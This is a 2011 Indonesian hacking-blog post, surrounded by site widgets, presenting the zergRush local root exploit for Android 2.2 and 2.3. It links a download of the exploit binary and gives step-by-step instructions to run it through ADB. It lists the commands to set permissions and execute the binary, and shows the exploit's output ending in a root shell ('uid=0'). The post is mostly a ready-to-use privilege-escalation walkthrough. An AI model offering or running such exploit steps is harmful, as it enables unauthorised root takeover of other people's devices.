Posts Subscribe to This BlogComments

Follow Us


widget

make widget
Please Vote Us
Enter Yahoo Topsites | Yahoo Rare Sites | Yahoo Booter Sites and Vote for this site !!!
Vote For Us
Top Blogs BOOTER-CENTER - Find me on Bloggers.com
Mau Pasang Iklan Disini? Resize Banner 460X61
ads ads ads peluang usaha

Monday, December 26, 2011

Localroot Exploit Android Froyo & Gingerbread

Please Vote Us
Enter Yahoo Topsites | Yahoo Rare Sites | Yahoo Booter Sites and Vote for this site !!!
Vote For Us

Adakah dari kalian yang memiliki Android / Temannya memiliki Android?
BOOTER-CENTER  ingin berbagi sekilas mengenai local root exploit untuk Froyo (2.2) dan Gingerbread (2.3). Nah untuk yang versi terbaru Honeycomb masih belum karena sudah di patch. Kebetulan di Indonesia masih banyak yang Froyo (2.2) dan Gingerbread (2.3).
Oke, yuk kita lanjutkan:
Silakan download tools untuk exploit di link berikut:
Download Link
Untuk informasi source & resource mengenai exploit di atas bisa dilihat disini:
Revolutionary Github Master Code
Untuk menjalankan exploit ini yang anda butuhkan adalah:
1. Siapkan ADB Shell untuk bisa menjalankan exploit ini, silakan dicari di google.
2. Anda harus mempunyai user terlebih dahulu untuk bisa melakukan eksekusi binary exploit.
3. Siapkan dan tenangkan hati anda
Eksekusi Exploit:
$ chmod 755 /data/local/zergRush
$ /data/local/zergRush

Hasilnya akan seperti berikut

[**] booter-center Modification Code - Froyo & GingerBread
[**] Zerg rush - Android 2.2/2.3 local root
[**] (C) 2011 Revolutionary. All rights reserved.

[**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.
[+] Found a GingerBread ! 0x00017118[*] Sending 149 zerglings ...[*] Trying a new path ...[*] Sending 149 zerglings ...[*] Trying a new path ...[*] Sending 149 zerglings ...[*] Trying a new path ...[*] Sending 149 zerglings ...
[+] Zerglings caused crash (good news): 0x401219c4 0x0054[*] Researching Metabolic Boost ...
[+] Speedlings on the go ! 0xafd260a9 0xafd39f9f[*] Poping 24 more zerglings[*] Sending 173 zerglings ...
[+] Rush did it ! It's a GG, man !
[+] Killing ADB and restarting as root..enjoy & eat it!

Hohoho.. Jika muncul jawaban yang demikian, maka anda sudah berhasil.
Silakan melakukan connect ulang ADB Shell Anda.
# id
uid=0 gid=0

Related Post



Get Traffic Like Spam
Loading...

0 Comment:

Post a Comment

Section meetings - Registered
recent entries

users online



ads ads ads ads
 

networkedblogs

B-C ON YAHOO

Trafic

Followers

MyFreeCopyright.com Registered & Protected MyFreeCopyright.com Registered & Protected